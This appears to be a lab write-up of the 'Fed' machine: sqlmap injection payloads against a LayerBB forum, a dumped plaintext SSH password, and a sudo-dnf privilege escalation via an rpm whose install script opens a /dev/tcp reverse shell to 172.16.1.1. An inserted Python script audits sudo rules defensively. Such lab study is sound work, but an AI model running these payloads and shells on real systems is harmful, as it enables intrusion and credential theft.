VHL — Fed
Web | Medium | Linux

Custom PHP forum on Fedora Linux with MariaDB. SQL injection bypasses authentication, leading to file write and shell upload.

February 12, 2025 | Virtual Hacking Labs
#PHP #SQLi #MariaDB #File Write

nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 22:34 EST
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:35 (0:00:12 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:36 (0:00:26 remaining)
Stats: 0:02:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:38 (0:00:45 remaining)
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.68
Host is up (0.022s latency).
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.8 (protocol 2.0)
| ssh-hostkey:
| 256 eb:59:13:ff:ca:a5:19:b7:be:3d:53:b9:7e:05:79:57 (ECDSA)
|_ 256 27:79:88:ab:06:f6:4d:c7:2b:65:a9:10:89:eb:a4:0a (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Fedora Linux))
| http-title: Fed Forum
|_Requested resource was forum.php
|_http-server-header: Apache/2.4.54 (Fedora Linux)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
3306/tcp open mysql MariaDB (unauthorized)
9090/tcp open ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=bb8ca7e9...
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2025-02-13T03:35:10
|_Not valid after: 2026-03-15T03:35:10
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| X-Frame-Options: sameorigin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
|_ font-weight: 300;
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
TRACEROUTE
HOP RTT ADDRESS
1 22.05 ms 10.11.1.68
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.89 seconds

80

80/tcp open http Apache httpd 2.4.54 ((Fedora Linux))
| http-title: Fed Forum
|_Requested resource was forum.php
|_http-server-header: Apache/2.4.54 (Fedora Linux)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set

sqli

The forum is LayerBB 1.1.3, which has a published SQL injection advisory:
- https://github.com/advisories/GHSA-rc84-w3xr-xww4

sqlmap

sqlmap -r req.txt --batch
___
__H__
___ ___[,]_____ ___ ___ {1.9#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:45:42 /2025-02-12/
[22:45:42] [INFO] parsing HTTP request from 'req.txt'
[22:45:42] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:45:42] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:45:42] [INFO] testing connection to the target URL
[22:45:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:45:42] [INFO] testing if the target URL content is stable
[22:45:42] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[22:45:42] [INFO] testing if POST parameter 'search_query' is dynamic
[22:45:43] [WARNING] POST parameter 'search_query' does not appear to be dynamic
[22:45:43] [INFO] heuristic (basic) test shows that POST parameter 'search_query' might be injectable (possible DBMS: 'MySQL')
[22:45:43] [INFO] testing for SQL injection on POST parameter 'search_query'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:45:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:45:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:45:44] [INFO] testing 'Generic inline queries'
[22:45:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:45:44] [WARNING] reflective value(s) found and filtering out
[22:45:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:45:48] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[22:45:48] [INFO] POST parameter 'search_query' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[22:45:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:45:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:45:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:45:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:45:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[22:45:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[22:45:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:45:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:45:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:45:48] [INFO] POST parameter 'search_query' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[22:45:48] [INFO] testing 'MySQL inline queries'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:45:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:45:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:45:59] [INFO] POST parameter 'search_query' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[22:45:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:45:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:45:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:45:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:45:59] [INFO] target URL appears to have 16 columns in query
[22:45:59] [INFO] POST parameter 'search_query' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:45:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'search_query' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 153 HTTP(s) requests:
---
Parameter: search_query (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: search_query=test') OR NOT 8332=8332#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search_query=test') AND (SELECT 3479 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3479=3479,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DccP&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search_query=test') AND (SELECT 1133 FROM (SELECT(SLEEP(5)))AGhM)-- NIbV&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: search_query=test') UNION ALL SELECT NULL,CONCAT(0x716a6b7a71,0x594b4f4e4949695269594173697a7661434c5245646554657a434e6e71536a5656495766624c7151,0x716a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
---
[22:45:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: PHP 7.4.33, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:45:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.11.1.68'

sqlmap -r req.txt --batch --dbs
[*] starting @ 23:37:58 /2025-02-12/
[23:37:58] [INFO] parsing HTTP request from 'req.txt'
[23:37:58] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:37:58] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:37:58] [INFO] resuming back-end DBMS 'mysql'
[23:37:58] [INFO] testing connection to the target URL
[23:37:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: Apache 2.4.54, PHP 7.4.33
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:37:58] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] layerbb
[*] mysql
[*] performance_schema
[*] ssh

sqlmap -r req.txt --batch -D ssh --tables
[*] starting @ 23:39:24 /2025-02-12/
[23:39:24] [INFO] parsing HTTP request from 'req.txt'
[23:39:24] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:24] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:24] [INFO] resuming back-end DBMS 'mysql'
[23:39:24] [INFO] testing connection to the target URL
[23:39:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: Apache 2.4.54, PHP 7.4.33
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:39:24] [INFO] fetching tables for database: 'ssh'
Database: ssh
[1 table]
+-----------+
| ssh_users |
+-----------+

sqlmap -r req.txt --batch -D ssh -T ssh_users --dump
[*] starting @ 23:39:45 /2025-02-12/
[23:39:45] [INFO] parsing HTTP request from 'req.txt'
[23:39:45] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:45] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:45] [INFO] resuming back-end DBMS 'mysql'
[23:39:45] [INFO] testing connection to the target URL
[23:39:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: Apache 2.4.54, PHP 7.4.33
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:39:46] [INFO] fetching columns for table 'ssh_users' in database 'ssh'
[23:39:46] [INFO] fetching entries for table 'ssh_users' in database 'ssh'
Database: ssh
Table: ssh_users
[1 entry]
+----+-------------------+----------+
| ID | password | username |
+----+-------------------+----------+
| 1 | FEder1K01!@ssw0rd | Federik |
+----+-------------------+----------+

creds

federik:FEder1K01!@ssw0rd

ssh as federik

ssh federik@10.11.1.68
federik@10.11.1.68's password:
[federik@localhost ~]$ whoami
federik

priv esc

sudo (dnf)

[federik@localhost ~]$ sudo -l
Matching Defaults entries for federik on localhost:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/var/lib/snapd/snap/bin
User federik may run the following commands on localhost:
(root) NOPASSWD: /usr/bin/dnf
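As an added example (my own code, not from the writeup or from VHL), here is a small audit script that parses `sudo -l` output of the shape shown above and flags rules that hand a package manager to root without an argument restriction. SAMPLE_SUDO_L is constructed from the output on this page, and the PACKAGE_MANAGERS list is an assumption of mine, not something the page states.

```python
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Constructed sample: the `sudo -l` output from this writeup. Fedora's sudo wraps
# long Defaults entries onto continuation lines, which must not be mistaken for rules.
SAMPLE_SUDO_L = """\
Matching Defaults entries for federik on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/var/lib/snapd/snap/bin

User federik may run the following commands on localhost:
    (root) NOPASSWD: /usr/bin/dnf
"""

# Assumed list: binaries that install packages and run their scriptlets as root.
# An unrestricted rule on any of them is equivalent to root (on this box, dnf
# installs a local .rpm whose pre-install scriptlet runs as root).
PACKAGE_MANAGERS = {"dnf", "yum", "rpm", "apt", "apt-get", "dpkg", "zypper", "pip", "pip3"}

# "(runas) TAG: TAG: cmd1, cmd2" -- the tag group is optional and may repeat.
RULE_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.*)$")


@dataclass(frozen=True)
class SudoRule:
    runas: str                 # e.g. "root" or "ALL : ALL"
    nopasswd: bool             # True when the NOPASSWD tag is present
    commands: tuple[str, ...]  # command specs as written on the rule line


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Return the command rules from `sudo -l` output, skipping the Defaults block."""
    rules: list[SudoRule] = []
    in_commands = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue  # still inside the (possibly wrapped) Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        tagset = {t.strip() for t in tags.split(":") if t.strip()}
        commands = tuple(c.strip() for c in cmds.split(",") if c.strip())
        rules.append(SudoRule(runas.strip(), "NOPASSWD" in tagset, commands))
    return rules


def risky_rules(rules: list[SudoRule]) -> list[tuple[str, str, bool]]:
    """Flag (runas, binary, nopasswd) for ALL or an unrestricted package manager."""
    findings = []
    for rule in rules:
        for cmd in rule.commands:
            parts = cmd.split()
            binary = os.path.basename(parts[0])
            # In sudoers a bare path means "any arguments"; a quoted "" means none.
            unrestricted = len(parts) == 1
            if cmd == "ALL" or (binary in PACKAGE_MANAGERS and unrestricted):
                findings.append((rule.runas, binary, rule.nopasswd))
    return findings


def audit(text: str) -> list[tuple[str, str, bool]]:
    return risky_rules(parse_sudo_l(text))


if __name__ == "__main__":
    for runas, binary, nopasswd in audit(SAMPLE_SUDO_L):
        print(f"root-equivalent sudo rule: ({runas}) {binary} nopasswd={nopasswd}")
```

The fix on a real host is to drop the rule or pin it to a fixed argument list (for example only `dnf upgrade`), since the `--setopt` and local-package paths of dnf cannot be made safe by the sudoers entry alone.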

[federik@localhost ~]$ vim root.sh

root.sh

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/172.16.1.1/1235 0>&1'

[federik@localhost ~]$ fpm -n x -s dir -t rpm -a all --before-install root.sh ./
Created package {:path=>"x-1.0-1.noarch.rpm"}
[federik@localhost ~]$ ls
root.sh x-1.0-1.noarch.rpm

--setopt=reposdir=/dev/null is passed to avoid repository checks.

[federik@localhost ~]$ sudo dnf install -y ./x-1.0-1.noarch.rpm --setopt=reposdir=/dev/null
Dependencies resolved.
===================================================================================================================================================
Package Architecture Version Repository Size
===================================================================================================================================================
Installing:
x noarch 1.0-1 @commandline 7.6 k
Transaction Summary
===================================================================================================================================================
Install 1 Package
Total size: 7.6 k
Installed size: 1.5 k
Downloading Packages:
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
Preparing : 1/1
Running scriptlet: x-1.0-1.noarch

nc -lnvp 1235
listening on [any] 1235 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.68] 36854
[root@localhost /]# whoammi
whoammi
bash: whoammi: command not found
[root@localhost /]# whoami
whoami
root
[root@localhost /]# cat /root/key.txt
cat /root/key.txt
b3g7bnca98utgbk2dy9c
[root@localhost /]# date
date
Thu Feb 13 06:24:30 AM CET 2025